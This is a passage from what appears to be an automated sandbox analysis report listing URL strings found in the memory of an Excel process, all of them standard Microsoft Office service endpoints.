    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1nS
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v12R3m
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1EnrichmentWACUrlhttps://enrichment.osi.
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/EnrichmentMetadataUrlhttps://enrichm
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlEnrichmentDisambiguat
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.comoYAnG
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7
    Source: EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechr
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://graph.ppe.windows.net
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/a8Kag
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://graph.windows.net
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://graph.windows.net/
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/_9Y
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/e
    Source: EXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/https://graph.windows.net
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.netv8
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com_
    Source: EXCEL.EXE, 00000001.00000002.751475998.0000000012F21000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: EXCEL.EXE, 00000001.00000003.281121315.0000000013080000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dMBI_SSL_SHORTofficeapps.live.comb
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: EXCEL.EXE, 00000001.00000002.751475998.0000000012F21000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comZYLnH
    Source: EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://inclient.store.office.com/gyro/client
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoret
    Source: EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
    Source: EXCEL.EXE, 00000001.00000003.281121315.0000000013080000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppHomeR
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook9
    Source: 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickrv
    Source: EXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: EXCEL.EXE, 00000001.00000002.751491365.0000000012F2A000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
